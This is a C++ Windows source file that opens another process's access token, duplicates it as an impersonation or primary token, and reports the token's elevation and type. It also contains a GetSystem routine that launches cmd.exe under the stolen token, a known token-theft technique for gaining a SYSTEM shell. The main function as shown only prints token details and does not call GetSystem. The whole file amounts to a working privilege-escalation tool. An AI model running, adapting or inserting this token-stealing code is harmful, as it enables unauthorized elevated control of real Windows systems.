#include <Windows.h>
#include <tchar.h>
#include <cstdlib>
#include <iostream>
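// Open process `pid` and return a handle to its primary token.
//
// Both opens ask for MAXIMUM_ALLOWED, so the returned handle carries whatever
// access the caller's own token is granted on the target; opening processes of
// other users or higher integrity typically needs SeDebugPrivilege.
// The intermediate process handle is closed on every path; the caller owns the
// returned token handle and must CloseHandle() it.
//
// Returns the token handle, or NULL on failure (after printing the Win32 error).
HANDLE GetToken(DWORD pid)
{
    HANDLE process = OpenProcess(MAXIMUM_ALLOWED, FALSE, pid);
    if (process == NULL)
    {
        // GetLastError() is a DWORD: print it with %lu. Passing it to %s would
        // dereference the error code as a wide-string pointer and crash.
        wprintf(L"Unable to get process %lu: error %lu\n", pid, GetLastError());
        return NULL;
    }

    HANDLE process_token = NULL;
    BOOL opened = OpenProcessToken(process, MAXIMUM_ALLOWED, &process_token);
    // Capture the error before CloseHandle() can overwrite it.
    DWORD err = opened ? ERROR_SUCCESS : GetLastError();

    // The process handle is only needed to reach the token; don't leak it.
    CloseHandle(process);

    if (!opened)
    {
        wprintf(L"Unable to get token: error %lu\n", err);
        return NULL;
    }
    return process_token;
}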
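// Print a short description of `process_token`: elevation state, whether it is
// a restricted token, and whether it is a primary or impersonation token.
//
// The caller keeps ownership of `process_token`; this function never closes it.
// (Closing a handle you do not own leaves the caller with a dangling value and
// invites a double close.)
//
// Returns TRUE if every query succeeded, FALSE on the first failing query
// (after printing the Win32 error). On FALSE the output is partial.
BOOL GetTokenInfo(HANDLE process_token)
{
    if (process_token == NULL)
    {
        wprintf(L"Unable to get token infomation: invalid token handle\n");
        return FALSE;
    }

    // Elevation: zero-initialised so a failed query never leaves us reading
    // an indeterminate value.
    TOKEN_ELEVATION elevation = {};
    DWORD returned = 0;
    if (!GetTokenInformation(process_token, TokenElevation, &elevation, sizeof(elevation), &returned))
    {
        // DWORD error code -> %lu (never %s).
        wprintf(L"Unable to get token infomation %lu\n", GetLastError());
        return FALSE;
    }
    if (elevation.TokenIsElevated)
    {
        wprintf(L"[*] Token is Elevated\n");
    }
    else
    {
        wprintf(L"[*] Token is not Elevated\n");
    }

    // Restricted tokens carry restricting SIDs (e.g. from CreateRestrictedToken).
    wprintf(L"[*] Token is %s\n", IsTokenRestricted(process_token) ? L"restricted" : L"unrestricted");

    // Token type. Size the buffer by the variable, not by the enum constant.
    TOKEN_TYPE type = TokenPrimary;
    returned = 0;
    if (!GetTokenInformation(process_token, TokenType, &type, sizeof(type), &returned))
    {
        wprintf(L"Unable to get token type %lu\n", GetLastError());
        return FALSE;
    }
    if (type == TokenPrimary)
    {
        wprintf(L"[*] Token is Primary\n");
    }
    else
    {
        wprintf(L"[*] Token is Impersonation\n");
    }
    return TRUE;
}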
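// Duplicate `process_token` as an impersonation token at SecurityImpersonation
// level, requesting MAXIMUM_ALLOWED access on the copy.
//
// A NULL or invalid input is not special-cased: DuplicateTokenEx rejects it
// (ERROR_INVALID_HANDLE) and we report that like any other failure.
// The caller owns the returned handle and must CloseHandle() it.
//
// Returns the new token handle, or NULL on failure (after printing the error).
HANDLE PrimaryToImpersonation(HANDLE process_token)
{
    HANDLE new_token = NULL;
    if (!DuplicateTokenEx(process_token, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenImpersonation, &new_token))
    {
        // DWORD is unsigned long: %lu, not %d.
        DWORD last_error = GetLastError();
        wprintf(L"ERROR: Could not duplicate process token [%lu]\n", last_error);
        return NULL;
    }
    return new_token;
}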
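// Duplicate `process_token` as a primary token (the kind CreateProcess* and
// CreateProcessWithTokenW accept), requesting MAXIMUM_ALLOWED on the copy.
//
// Converting an impersonation token to a primary one only succeeds when the
// source token was obtained at an impersonation level that permits it
// (identification-level tokens cannot be promoted); DuplicateTokenEx reports
// that as a failure. A NULL input fails the same way (ERROR_INVALID_HANDLE).
// The caller owns the returned handle and must CloseHandle() it.
//
// Returns the new token handle, or NULL on failure (after printing the error).
HANDLE ImpersonationToPrimary(HANDLE process_token)
{
    HANDLE new_token = NULL;
    if (!DuplicateTokenEx(process_token, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &new_token))
    {
        // DWORD is unsigned long: %lu, not %d.
        DWORD last_error = GetLastError();
        wprintf(L"ERROR: Could not duplicate process token [%lu]\n", last_error);
        return NULL;
    }
    return new_token;
}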
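// Spawn cmd.exe in a new console under `process_token` via
// CreateProcessWithTokenW.
//
// `process_token` must be a primary token (use ImpersonationToPrimary first
// if you hold an impersonation token). Per the Win32 documentation the calling
// process needs SeImpersonatePrivilege for this call, so it is normally only
// usable from a service-like context; without it the call fails with
// ERROR_PRIVILEGE_NOT_HELD.
//
// The new process is left running; its process and thread handles are closed
// here because nothing in this program waits on them.
//
// Returns TRUE if the process was created, FALSE on failure (after printing
// the Win32 error).
BOOL GetSystem(HANDLE process_token)
{
    // CreateProcessWithTokenW takes the wide STARTUPINFOW regardless of UNICODE,
    // and requires cb to be set.
    STARTUPINFOW start_info = {};
    start_info.cb = sizeof(start_info);
    PROCESS_INFORMATION process_info = {};

    BOOL created = CreateProcessWithTokenW(process_token, LOGON_NETCREDENTIALS_ONLY,
                                           L"C:\\Windows\\System32\\cmd.exe", NULL,
                                           CREATE_NEW_CONSOLE, NULL, NULL,
                                           &start_info, &process_info);
    if (!created)
    {
        wprintf(L"CreateProcessWithTokenW: %lu\n", GetLastError());
        return FALSE;
    }

    // Release our references; the child keeps running independently.
    CloseHandle(process_info.hThread);
    CloseHandle(process_info.hProcess);
    return TRUE;
}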
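// Entry point: open the target process's token, duplicate it as an
// impersonation token and print its properties.
//
// The target PID is taken from argv[1] when given, otherwise the default 684
// is used. Every intermediate handle is checked before use and closed once it
// is no longer needed. GetSystem() is not invoked here.
//
// Exit status: 0 on success, 1 on any failure.
int main(int argc, char **argv)
{
    DWORD pid = 684;
    if (argc > 1)
    {
        char *end = NULL;
        unsigned long parsed = strtoul(argv[1], &end, 10);
        if (end == argv[1] || *end != '\0')
        {
            wprintf(L"Invalid PID\n");
            return 1;
        }
        pid = (DWORD)parsed;
    }

    HANDLE process_token = GetToken(pid);
    if (process_token == NULL)
    {
        return 1;
    }

    HANDLE impersonation_token = PrimaryToImpersonation(process_token);
    // The original token is no longer needed once duplicated (or once
    // duplication has failed).
    CloseHandle(process_token);
    if (impersonation_token == NULL)
    {
        return 1;
    }

    BOOL ok = GetTokenInfo(impersonation_token);
    CloseHandle(impersonation_token);
    return ok ? 0 : 1;
}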